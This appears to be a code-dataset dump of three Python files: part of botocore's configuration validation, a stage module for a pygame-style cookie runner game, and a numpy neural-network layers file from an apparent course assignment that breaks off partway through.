keys to the dictionary\n for key, value in kwargs.items():\n if key in self.OPTION_DEFAULTS:\n user_provided_options[key] = value\n # The key must exist in the available options\n else:\n raise TypeError(f\"Got unexpected keyword argument '{key}'\")\n\n # The number of args should not be longer than the allowed\n # options\n if len(args) > len(option_order):\n raise TypeError(\n f\"Takes at most {len(option_order)} arguments ({len(args)} given)\"\n )\n\n # Iterate through the args passed through to the constructor and map\n # them to appropriate keys.\n for i, arg in enumerate(args):\n # If it a kwarg was specified for the arg, then error out\n if option_order[i] in user_provided_options:\n raise TypeError(\n f\"Got multiple values for keyword argument '{option_order[i]}'\"\n )\n user_provided_options[option_order[i]] = arg\n\n return user_provided_options\n\n def _validate_s3_configuration(self, s3):\n if s3 is not None:\n addressing_style = s3.get('addressing_style')\n if addressing_style not in ['virtual', 'auto', 'path', None]:\n raise InvalidS3AddressingStyleError(\n s3_addressing_style=addressing_style\n )\n\n def _validate_retry_configuration(self, retries):\n valid_options = ('max_attempts', 'mode', 'total_max_attempts')\n valid_modes = ('legacy', 'standard', 'adaptive')\n if retries is not None:\n for key, value in retries.items():\n if key not in valid_options:\n raise InvalidRetryConfigurationError(\n retry_config_option=key,\n valid_options=valid_options,\n )\n if key == 'max_attempts' and value < 0:\n raise InvalidMaxRetryAttemptsError(\n provided_max_attempts=value,\n min_value=0,\n )\n if key == 'total_max_attempts' and value < 1:\n raise InvalidMaxRetryAttemptsError(\n provided_max_attempts=value,\n min_value=1,\n )\n if key == 'mode' and value not in valid_modes:\n raise InvalidRetryModeError(\n provided_retry_mode=value,\n valid_modes=valid_modes,\n )\n\n def merge(self, other_config):\n \"\"\"Merges the config object with another config object\n\n This will merge in all non-default values from the provided config\n and return a new config object\n\n :type other_config: botocore.config.Config\n :param other config: Another config object to merge with. The values\n in the provided config object will take precedence in the merging\n\n :returns: A config object built from the merged values of both\n config objects.\n \"\"\"\n # Make a copy of the current attributes in the config object.\n config_options = copy.copy(self._user_provided_options)\n\n # Merge in the user provided options from the other config\n config_options.update(other_config._user_provided_options)\n\n # Return a new config object with the merged properties.\n return Config(**config_options)\n", "sub_path": "botocore/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 15129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "botocore.compat.OrderedDict", "line_number": 225, "usage_type": "call"}, {"api_name": "botocore.endpoint.DEFAULT_TIMEOUT", "line_number": 232, "usage_type": "name"}, {"api_name": "botocore.endpoint.DEFAULT_TIMEOUT", "line_number": 233, "usage_type": "name"}, {"api_name": "botocore.endpoint.MAX_POOL_CONNECTIONS", "line_number": 235, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 263, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidS3AddressingStyleError", "line_number": 316, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidRetryConfigurationError", "line_number": 326, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidMaxRetryAttemptsError", "line_number": 331, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidMaxRetryAttemptsError", "line_number": 336, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidRetryModeError", "line_number": 341, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 360, "usage_type": "call"}]} +{"seq_id": "548541204", "text": "import random\nimport json\nimport os\nimport time\n\nfrom cookie import *\nfrom back_ground import *\nfrom ground import *\nfrom obstacle import *\nfrom item import *\nfrom score import *\nimport game_framework\nimport title_state\nimport result_state\nimport stage1_select\nimport stage2_select\nimport stage3_select\nimport stage4_select\n\nname = \"MainState\"\n\ncookie = None\nbackground = None\nnomal_fork = None\nnomal_thorn = None\nspecial_fork = None\ndouble_thorn = None\nboard = None\nitem_jelly = None\nhp_jelly = None\nobject = []\nranking_data = []\ncurrent_time = 0.0\n\ndef collide(a, b):\n left_a, bottom_a, right_a, top_a = a.get_bb()\n left_b, bottom_b, right_b, top_b = b.get_bb()\n\n if left_a > right_b: return False\n if right_a < left_b: return False\n if top_a < bottom_b: return False\n if bottom_a > top_b: return False\n\n return True\n\ndef get_frame_time():\n\n global current_time\n\n frame_time = get_time() - current_time\n current_time += frame_time\n return frame_time\n\ndef enter():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n start, score_jelly, hp_jelly, font, objects, score, brave_cookie, ginger_brave_cookie, f, ranking_data\n\n cookie = stage1_select.get_cookie\n brave_cookie = stage1_select.brave_cookie_select\n ginger_brave_cookie = stage1_select.ginger_brave_cookie_select\n background = Stage1_Background(800, 600)\n ground = Stage1_Ground(800, 150)\n score = Score()\n board = Stage1_Board().create()\n nomal_fork = Stage1_Nomal_Fork().create()\n nomal_thorn = Stage1_Nomal_Thorn().create()\n special_fork = Stage1_Special_Fork().create()\n double_thorn = Stage1_Double_Thorn().create()\n score_jelly = Stage1_Score_Jelly().create()\n hp_jelly = Stage1_Hp_Jelly().create()\n objects = [nomal_fork, special_fork, nomal_thorn, double_thorn, score_jelly, hp_jelly, board]\n font = load_font('Resource\\\\ENCR10B.TTF')\n start = time.time()\n\n f = open('ranking_data.txt', 'r')\n ranking_data = json.load(f)\n f.close()\n\ndef exit():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, start, \\\n score_jelly, hp_jelly, objects, score\n del(cookie)\n del(background)\n del(ground)\n\n for list in objects:\n for dict in list:\n list.remove(dict)\n del(dict)\n del(list)\n\n end = time.time()\n\n print(\"Stage1 Clear Time : \", (end - start))\n\ndef pause():\n pass\n\n\ndef resume():\n pass\n\n\ndef handle_events():\n global cookie\n events = get_events()\n\n for event in events:\n if event.type == SDL_QUIT:\n game_framework.quit()\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n game_framework.change_state(title_state)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_2:\n game_framework.change_state(stage2_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_3:\n game_framework.change_state(stage3_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_4:\n game_framework.change_state(stage4_select)\n\n else:\n cookie.handle_events(event)\n\ndef update():\n global cookie, brave_cookie, ginger_brave_cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n score_jelly, hp_jelly, objects, score\n\n frame_time = get_frame_time()\n background.update(frame_time)\n ground.update(frame_time)\n score.stage1_score()\n cookie.update(frame_time)\n\n if brave_cookie == True and cookie.hp <= 0:\n cookie = Ginger_Brave_Cookie()\n if ginger_brave_cookie == True and cookie.hp <= 0:\n cookie = Brave_Cookie()\n\n for list in objects:\n for dict in list:\n dict.update(frame_time)\n if collide(cookie, dict):\n if list == score_jelly:\n list.remove(dict)\n cookie.scoreSound(dict)\n elif list == hp_jelly:\n list.remove(dict)\n cookie.heal(dict)\n elif list == board:\n for dict in list:\n dict.state = \"None\"\n else:\n cookie.state = \"Collide\"\n\n if background.map_size >= 55 and cookie.y == 200:\n game_framework.change_state(stage2_select)\n elif background.map_size >= 55 and cookie.y == 250:\n game_framework.change_state(stage3_select)\n if (Brave_Cookie.hp <= 0) and (Ginger_Brave_Cookie.hp <= 0):\n game_framework.change_state(result_state)\n\ndef draw():\n global cookie, background, ground, objects, score\n clear_canvas()\n background.draw()\n ground.draw()\n\n for list in objects:\n for dict in list:\n dict.draw()\n\n font.draw(100, 550, 'Score : %3.2d' % score.score, (255, 255, 255))\n cookie.draw()\n\n delay(0.03)\n update_canvas()", "sub_path": "stage1.py", "file_name": "stage1.py", "file_ext": "py", "file_size_in_byte": 4950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "stage1_select.get_cookie", "line_number": 58, "usage_type": "attribute"}, {"api_name": "stage1_select.brave_cookie_select", "line_number": 59, "usage_type": "attribute"}, {"api_name": "stage1_select.ginger_brave_cookie_select", "line_number": 60, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "json.load", "line_number": 76, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "game_framework.quit", "line_number": 110, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 113, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 116, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 119, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 122, "usage_type": "call"}, {"api_name": "cookie.handle_events", "line_number": 125, "usage_type": "call"}, {"api_name": "ground.update", "line_number": 133, "usage_type": "call"}, {"api_name": "score.stage1_score", "line_number": 134, "usage_type": "call"}, {"api_name": "cookie.update", "line_number": 135, "usage_type": "call"}, {"api_name": "cookie.hp", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cookie.hp", "line_number": 139, "usage_type": "attribute"}, {"api_name": "cookie.scoreSound", "line_number": 148, "usage_type": "call"}, {"api_name": "cookie.heal", "line_number": 151, "usage_type": "call"}, {"api_name": "cookie.state", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cookie.y", "line_number": 158, "usage_type": "attribute"}, {"api_name": "game_framework.change_state", "line_number": 159, "usage_type": "call"}, {"api_name": "cookie.y", "line_number": 160, "usage_type": "attribute"}, {"api_name": "game_framework.change_state", "line_number": 161, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 163, "usage_type": "call"}, {"api_name": "ground.draw", "line_number": 169, "usage_type": "call"}, {"api_name": "score.score", "line_number": 175, "usage_type": "attribute"}, {"api_name": "cookie.draw", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "312266098", "text": "import numpy as np\nfrom scipy.signal import fftconvolve, convolve\nfrom itertools import product\n\ndef affine_forward(x, w, b):\n \"\"\"\n Computes the forward pass for an affine (fully-connected) layer.\n\n The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N\n examples, where each example x[i] has shape (d_1, ..., d_k). We will\n reshape each input into a vector of dimension D = d_1 * ... * d_k, and\n then transform it to an output vector of dimension M.\n\n Inputs:\n - x: A numpy array containing input data, of shape (N, d_1, ..., d_k)\n - w: A numpy array of weights, of shape (D, M)\n - b: A numpy array of biases, of shape (M,)\n\n Returns a tuple of:\n - out: output, of shape (N, M)\n - cache: (x, w, b)\n \"\"\"\n cache = (x, w, b)\n x = x.reshape(x.shape[0], -1) # NxD\n out = x.dot(w) + b\n return out, cache\n\n\ndef affine_backward(dout, cache):\n \"\"\"\n Computes the backward pass for an affine layer.\n\n Inputs:\n - dout: Upstream derivative, of shape (N, M)\n - cache: Tuple of:\n - x: Input data, of shape (N, d_1, ... d_k)\n - w: Weights, of shape (D, M)\n - b: biases, of shape (M,\n\n Returns a tuple of:\n - dx: Gradient with respect to x, of shape (N, d1, ..., d_k)\n - dw: Gradient with respect to w, of shape (D, M)\n - db: Gradient with respect to b, of shape (M,)\n \"\"\"\n x, w, b = cache\n\n dx = dout.dot(w.T).reshape(x.shape)\n dw = x.reshape(x.shape[0], -1).T.dot(dout)\n db = dout.sum(axis=0)\n\n return dx, dw, db\n\n\ndef relu_forward(x):\n \"\"\"\n Computes the forward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - x: Inputs, of any shape\n\n Returns a tuple of:\n - out: Output, of the same shape as x\n - cache: x\n \"\"\"\n out = np.maximum(0, x)\n cache = x\n return out, cache\n\n\ndef relu_backward(dout, cache):\n \"\"\"\n Computes the backward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - dout: Upstream derivatives, of any shape\n - cache: Input x, of same shape as dout\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n dx, x = None, cache\n dout[np.where(x <= 0.)] = 0.\n dx = dout\n\n return dx\n\n\ndef batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Forward pass for batch normalization.\n\n During training the sample mean and (uncorrected) sample variance are\n computed from minibatch statistics and used to normalize the incoming data.\n During training we also keep an exponentially decaying running mean of the mean\n and variance of each feature, and these averages are used to normalize data\n at test-time.\n\n At each timestep we update the running averages for mean and variance using\n an exponential decay based on the momentum parameter:\n\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n\n Note that the batch normalization paper suggests a different test-time\n behavior: they compute sample mean and variance for each feature using a\n large number of training images rather than using a running average. For\n this implementation we have chosen to use running averages instead since\n they do not require an additional estimation step; the torch7 implementation\n of batch normalization also uses running averages.\n\n Input:\n - x: Data of shape (N, D)\n - gamma: Scale parameter of shape (D,)\n - beta: Shift parameter of shape (D,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n\n Returns a tuple of:\n - out: of shape (N, D)\n - cache: A tuple of values needed in the backward pass\n \"\"\"\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n var = np.var(x, axis=0)\n mean = x.mean(axis=0)\n x_shift = x - mean\n x_norm = x_shift/np.sqrt(var + eps)\n\n out = gamma*x_norm\n out += beta\n\n scale = (1. - momentum)\n running_mean *= momentum\n running_mean += scale*mean\n\n running_var *= momentum\n running_var += scale*var\n\n cache = (x_shift, x_norm, var+eps, gamma)\n # cache = (x, mean, var+eps, gamma)\n\n elif mode == 'test':\n out = (x - running_mean)/np.sqrt(running_var + eps)\n out *= gamma\n out += beta\n\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache\n\n\ndef batchnorm_backward(dout, cache):\n \"\"\"\n Backward pass for batch normalization.\n\n For this implementation, you should write out a computation graph for\n batch normalization on paper and propagate gradients backward through\n intermediate nodes.\n\n Inputs:\n - dout: Upstream derivatives, of shape (N, D)\n - cache: Variable of intermediates from batchnorm_forward.\n\n Returns a tuple of:\n - dx: Gradient with respect to inputs x, of shape (N, D)\n - dgamma: Gradient with respect to scale parameter gamma, of shape (D,)\n - dbeta: Gradient with respect to shift parameter beta, of shape (D,)\n \"\"\"\n\n # I just did the alt version...vanilla was dumb\n\n return batchnorm_backward_alt(dout, cache)\n\n\ndef batchnorm_backward_alt(dout, cache):\n \"\"\"\n Alternative backward pass for batch normalization.\n\n For this implementation you should work out the derivatives for the batch\n normalizaton backward pass on paper and simplify as much as possible. You\n should be able to derive a simple expression for the backward pass.\n\n Note: This implementation should expect to receive the same cache variable\n as batchnorm_backward, but might not use all of the values in the cache.\n\n Inputs / outputs: Same as batchnorm_backward\n \"\"\"\n x_shift, x_norm, var_eps, gamma = cache\n dx_norm = gamma*dout\n\n dgamma = np.einsum('ij,ij->j', dout, x_norm)\n dbeta = np.sum(dout, axis=0)\n\n dx = dx_norm - np.mean(dx_norm, axis=0)\n dx -= x_shift*np.einsum('ij,ij->j', dx_norm, x_shift)/(var_eps*dx_norm.shape[0])\n dx /= np.sqrt(var_eps)\n\n return dx, dgamma, dbeta\n\n\ndef dropout_forward(x, dropout_param):\n \"\"\"\n Performs the forward pass for (inverted) dropout.\n\n Inputs:\n - x: Input data, of any shape\n - dropout_param: A dictionary with the following keys:\n - p: Dropout parameter. We drop each neuron output with probability p.\n - mode: 'test' or 'train'. If the mode is train, then perform dropout;\n if the mode is test, then just return the input.\n - seed: Seed for the random number generator. Passing seed makes this\n function deterministic, which is needed for gradient checking but not in\n real networks.\n\n Outputs:\n - out: Array of the same shape as x.\n - cache: A tuple (dropout_param, mask). In training mode, mask is the dropout\n mask that was used to multiply the input; in test mode, mask is None.\n \"\"\"\n p, mode = dropout_param['p'], dropout_param['mode']\n if 'seed' in dropout_param:\n np.random.seed(dropout_param['seed'])\n\n mask = None\n out = None\n\n if mode == 'train':\n mask = (np.random.rand(*x.shape) < p)/p\n out = x*mask\n elif mode == 'test':\n out = x\n\n cache = (dropout_param, mask)\n out = out.astype(x.dtype, copy=False)\n\n return out, cache\n\n\ndef dropout_backward(dout, cache):\n \"\"\"\n Perform the backward pass for (inverted) dropout.\n\n Inputs:\n - dout: Upstream derivatives, of any shape\n - cache: (dropout_param, mask) from dropout_forward.\n \"\"\"\n dropout_param, mask = cache\n mode = dropout_param['mode']\n\n dx = None\n if mode == 'train':\n dx = mask*dout\n elif mode == 'test':\n dx = dout\n return dx\n\n\ndef flip_ndarray(x):\n \"\"\" Reverse the positions of the entries of the input array along all of its axes.\n\n Parameters\n ----------\n x : numpy.ndarray\n\n Returns\n -------\n out : numpy.ndarray\n A view of x with all of its axes reversed. Since a view is returned, this operation is O(1).\n\n Example\n ------\n x = array([[1, 2, 3],\n [6, 5, 6]])\n flip_ndarray(x))\n >> array([[6, 5, 4],\n [3, 2, 1]])\"\"\"\n loc = tuple(slice(None, None, -1) for i in xrange(x.ndim))\n return x[loc]\n\n\ndef nd_convolve(dat, conv_kernel, stride, outshape=None):\n \"\"\" Perform a convolution of two ndarrays, using a specified stride.\n\n Parameters\n ----------\n data : numpy.ndarray\n Array to be convolved over.\n kernel : numpy.ndarray\n Kernel used to perform convolution.\n stride : Union[Iterable[int, ...], Dict[int, int], int]\n Step sizes used while sliding the kernel during the convolution.\n - If a dictionary is provided, then it is used to map (axis-index -> stride-value). If an\n axis is not specified in the dictionary keys, then a stride of 1 is used along that axis.\n - If an iterable is provided, it must provide an explicit stride value for each axis (in order\n of ascending axis-index).\n - If a single stride value is specified, that value is used for every axis.\n\n outshape : Optional[Tuple[int, ...]]\n Provide the known output shape of the convolution, allowing the function to bypass\n sanity checks and some initial computations.\n\n Returns\n -------\n out : numpy.ndarray\n An array of the resulting convolution.\n \"\"\"\n if np.max(dat.shape) >= 500:\n conv = fftconvolve\n else:\n conv = convolve\n\n if type(stride) is dict:\n stride_gen = (stride.get(key, 1) for key in range(dat.ndim))\n elif hasattr(stride, '__iter__'):\n stride_gen = stride\n else:\n stride_gen = (stride for i in range(dat.ndim))\n stride = np.fromiter(stride_gen, dtype=int)\n\n if outshape is None:\n outshape = get_outshape(dat.shape, conv_kernel.shape, stride)\n\n full_conv = conv(dat, conv_kernel, mode='valid')\n\n if np.all(stride == 1):\n return full_conv\n\n # all index positions to down-sample the convolution, given stride > 1\n all_pos = zip(*product(*(stride[n]*np.arange(i) for n,i in enumerate(outshape))))\n out = np.zeros(outshape, dtype=dat.dtype)\n out.flat = full_conv[all_pos]\n return out\n\n\ndef get_outshape(dat_shape, kernel_shape, stride):\n \"\"\" Returns the shape of the ndarray resulting from the convolution, using specified stride,\n of two ndarrays whose shapes are specified.\n\n Parameters\n ----------\n dat_shape : Iterable[int, ...]\n Shape of array to be convolved over.\n kernel_shape : Iterable[int, ...]\n Shape of kernel used to perform convolution.\n stride : Union[int, Iterable[int, ...]] ( > 0)\n Step size used while sliding the kernel during the convolution.\n\n Returns\n -------\n out : numpy.ndarray([int, ...])\n Shape of the array resulting from the convolution.\"\"\"\n\n dat_shape = np.array(dat_shape)\n kernel_shape = np.array(kernel_shape)\n\n if hasattr(stride, '__iter__'):\n stride = np.fromiter(stride, dtype=float)\n assert len(stride) == len(dat_shape), 'The stride iterable must provide a stride value for each dat axis.'\n else:\n stride = float(stride)\n assert len(dat_shape) == len(kernel_shape), \"kernel and data must have same number of dimensions\"\n\n outshape = (dat_shape-kernel_shape)/stride+1.\n for num in outshape:\n assert num.is_integer(), num\n outshape = np.rint(outshape).astype(int)\n\n return outshape\n\n\ndef padder(dat, pad, skip_axes=[0]):\n \"\"\" Returns an array padded with zeros with specified depth on both sides of each axis. A list of\n axes can be specified, which will not receive any padding.\n\n Parameters\n ----------\n dat : numpy.ndarray\n Array to be padded\n pad : int ( >= 0)\n Padding depth to be used on each end of a padding axis.\n skip_axes : Union[int, Iterable[int, ...]]\n The indices corresponding to axes that will not be padded.\n\n Returns\n -------\n out : numpy.ndarray\n Array padded with zeros.\"\"\"\n assert pad >= 0 and type(pad) == int\n if pad == 0:\n return dat\n\n if type(skip_axes) == int:\n skip_axes = [skip_axes]\n assert hasattr(skip_axes, '__iter__')\n padding = [(pad, pad) for i in xrange(dat.ndim)]\n\n for ax in skip_axes:\n padding[ax] = (0, 0)\n\n return np.pad(dat, padding, mode='constant').astype(dat.dtype)\n\n\ndef conv_forward_naive(x, w, b, conv_param):\n \"\"\"\n A naive implementation of the forward pass for a convolutional layer.\n\n The input consists of N data points, each with C channels, height H and width\n W. We convolve each input with F different filters, where each filter spans\n all C channels and has height HH and width HH.\n\n Input:\n - x: Input data of shape (N, C, H, W)\n - w: Filter weights of shape (F, C, HH, WW)\n - b: Biases, of shape (F,)\n - conv_param: A dictionary with the following keys:\n - 'stride': The number of pixels between adjacent receptive fields in the\n horizontal and vertical directions.\n - 'pad': The number of pixels that will be used to zero-pad the input.\n\n Returns a tuple of:\n - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n - cache: (x, w, b, conv_param)\n \"\"\"\n\n pad_x = padder(x, conv_param['pad'], skip_axes=[0, 1])\n conv_out_shape = get_outshape(pad_x[0].shape, w[0].shape, conv_param['stride'])\n out = np.zeros((x.shape[0], w.shape[0], conv_out_shape[-2], conv_out_shape[-1]))\n\n for nk, kernel in enumerate(w):\n # note: we are actually computing a correlation, not a convolution\n conv_kernel = flip_ndarray(kernel)\n for nd, dat in enumerate(pad_x):\n out[nd, nk, :, :] = nd_convolve(dat, conv_kernel, conv_param['stride'], conv_out_shape)\n out[:, nk:nk+1, :, :] += b[nk]\n\n cache = (x, w, b, conv_param)\n return out, cache\n\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a convolutional layer.\n\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n\n Returns a tuple of:\n - dx: Gradient with respect to x\n - dw: Gradient with respect to w\n - db: Gradient with respect to b\n \"\"\"\n\n x, w, b, conv_param = cache\n\n dx = np.zeros_like(x, dtype=x.dtype)\n dw = np.zeros_like(w, dtype=w.dtype)\n db = np.sum(dout, axis=(0, 2, 3))\n\n pad = conv_param['pad']\n stride = conv_param['stride']\n\n npad = np.array([0]+[pad for i in xrange(x[0].ndim-1)])\n outshape = (np.array(x[0].shape)-np.array(w[0].shape)+2.*npad)/float(stride)+1.\n outshape = np.round(outshape).astype(int)\n\n # all positions to place the kernel\n all_pos = list(product(*[stride*np.arange(i) for i in outshape]))\n all_slices = [tuple(slice(start, start+w[0].shape[i]) for i,start in enumerate(j)) for j in all_pos]\n\n if pad:\n pad_ax = [(0, 0)] + [(pad, pad) for i in xrange(x[0].ndim-1)]\n\n for nk, kernel in enumerate(w): # iterate over all kernels\n dx_kernel = np.zeros(x.shape, dtype=x.dtype)\n dkernel = np.zeros_like(kernel, dtype=kernel.dtype)\n for nd, dat in enumerate(x): # iterate over each piece of data to be convolved\n if pad:\n dat = np.pad(dat, pad_ax, mode='constant').astype(dat.dtype)\n\n dy = dout[nd, nk][np.newaxis, :, :]\n ddat = np.zeros((x[0].shape[0], x[0].shape[1]+2*pad, x[0].shape[2]+2*pad), dtype=x[0].dtype)\n\n for i, slices in enumerate(all_slices):\n loc = np.unravel_index(i, outshape)\n dy_val = dy[loc]\n ddat[slices] += dy_val*kernel\n dkernel += dy_val*dat[slices]\n\n if pad:\n ddat = ddat[:, pad:-pad, pad:-pad]\n\n dx_kernel[nd] = ddat[:]\n dw[nk:nk+1] = dkernel\n dx += dx_kernel\n\n return dx, dw, db\n\n\ndef max_pool(x, pool_shape, stride, pooling_axes, backprop=False, dout=None):\n \"\"\" Pool the values of an ndarray, by taking the max over a specified pooling\n filter volume that rasters across the specified axes of x with a given stride.\n\n A backprop flag can be toggled to, instead, perform back-propagation through the\n maxpool layer (i.e. pass gradient values through of the array elements that\n contributed to the forward pooling).\n\n Parameters\n ----------\n x : numpy.ndarray\n Input array to be pooled.\n pool_shape : Iterable[int, ...]\n Shape of the pooling_filter along each specified pooling axis, listed\n in ascending axis order. No entries are provided for non-pooling axes.\n stride : int ( > 0)\n Step size used while rastering the pooling filter across x.\n pooling_axes : Union[int, Iterable[int, ...]]\n The axes along which the values of x will be max-pooled.\n backprop : bool, optional\n Indicates whether or not max_pool performs back propagation\n instead of pooling.\n dout : Union[NoneType, numpy.ndarray]\n \"Upstream\" array, whose values will be back propagated through\n the max-pool layer. This must be specified if backprop is True.\n\n Returns\n -------\n if backprop is False\n out : numpy.ndarray\n An array of the max-pooled values of x.\n\n if backprop is True\n dx : numpy.ndarray (shape=x.shape)\n An array of values from dout back-propagated through the pooling layer.\n \"\"\"\n\n if type(pooling_axes) is int:\n pooling_axes = (pooling_axes)\n pooling_axes = tuple(sorted(pooling_axes))\n\n pool_only_slice = tuple(slice(None, None) if i in pooling_axes else 0 for i in range(x.ndim))\n outshape = get_outshape(x[pool_only_slice].shape, pool_shape, stride)\n\n if backprop:\n assert dout is not None, \"dout must be provided during backprop\"\n mask_view = tuple(np.newaxis if i in pooling_axes else slice(None, None) for i in range(x.ndim))\n dx = np.zeros_like(x, dtype=x.dtype)\n\n else:\n tmp_shape = list(x.shape)\n for i, ax in enumerate(pooling_axes):\n tmp_shape[ax] = outshape[i]\n out = np.zeros(tmp_shape, dtype=x.dtype)\n\n all_slices = [slice(None, None) for i in range(x.ndim)]\n\n # iterate over positions to place the pooling filter\n for i, pos in enumerate(product(*[stride*np.arange(i) for i in outshape])):\n\n slices = all_slices[:]\n # generate slices to make pooling filter views of x\n for j, start in enumerate(pos):\n slices[pooling_axes[j]] = slice(start, start + pool_shape[j])\n slices = tuple(slices)\n\n # generate slices of output array to update\n inds = np.unravel_index(i, outshape)\n loc = all_slices[:]\n for cnt, ax in enumerate(pooling_axes):\n loc[ax] = inds[cnt]\n\n maxes = np.amax(x[slices], axis=pooling_axes)\n\n if not backprop:\n out[loc] = maxes\n else:\n dx[slices][np.where(x[slices] == maxes[mask_view])] = dout[loc].flat\n\n if not backprop:\n return out\n else:\n return dx\n\n\ndef max_pool_forward_naive(x, pool_param):\n \"\"\"\n A naive implementation of the forward pass for a max pooling layer.\n\n Inputs:\n - x: Input data, of shape (N, C, H, W)\n - pool_param: dictionary with the following keys:\n - 'pool_height': The height of each pooling region\n - 'pool_width': The width of each pooling region\n - 'stride': The distance between adjacent pooling regions\n\n Returns a tuple of:\n - out: Output data\n - cache: (x, pool_param)\n \"\"\"\n\n pool_shape = (pool_param['pool_height'], pool_param['pool_width'])\n cache = (x, pool_param)\n return max_pool(x, pool_shape, pool_param['stride'], (2, 3)), cache\n\n\ndef max_pool_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a max pooling layer.\n\n Inputs:\n - dout: Upstream derivatives\n - cache: A tuple of (x, pool_param) as in the forward pass.\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n x, pool_param = cache\n pool_shape = (pool_param['pool_height'], pool_param['pool_width'])\n return max_pool(x, pool_shape, pool_param['stride'], (2, 3), backprop=True, dout=dout)\n\n\ndef spatial_batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Computes the forward pass for spatial batch normalization.\n\n Inputs:\n - x: Input data of shape (N, C, H, W)\n - gamma: Scale parameter, of shape (C,)\n - beta: Shift parameter, of shape (C,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance. momentum=0 means that\n old information is discarded completely at every time step, while\n momentum=1 means that new information is never incorporated. The\n default of momentum=0.9 should work well in most situations.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n\n Returns a tuple of:\n - out: Output data, of shape (N, C, H, W)\n - cache: Values needed for the backward pass\n \"\"\"\n out, cache = None, None\n\n N, C, H, W = x.shape\n out, cache = batchnorm_forward(x.reshape(-1, C), gamma, beta, bn_param)\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out.reshape(N, C, H, W), cache\n\n\ndef spatial_batchnorm_backward(dout, cache):\n \"\"\"\n Computes the backward pass for spatial batch normalization.\n\n Inputs:\n - dout: Upstream derivatives, of shape (N, C, H, W)\n - cache: Values from the forward pass\n\n Returns a tuple of:\n - dx: Gradient with respect to inputs, of shape (N, C, H, W)\n - dgamma: Gradient with respect to scale parameter, of shape (C,)\n - dbeta: Gradient with respect to shift parameter, of shape (C,)\n \"\"\"\n dx, dgamma, dbeta = None, None, None\n N, C, H, W = dout.shape\n\n dx, dgamma, dbeta = batchnorm_backward_alt(dout.reshape(-1, C), cache)\n #############################################################################\n # TODO: Implement the backward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return dx.reshape(N, C, H, W), dgamma, dbeta\n\n\ndef svm_loss(x, y):\n \"\"\"\n Computes the loss and gradient using for multiclass SVM classification.\n\n Inputs:\n - x: Input data, of shape (N, C) where x[i, j] is the score for the jth class\n for the ith input.\n - y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and\n 0 <= y[i] < 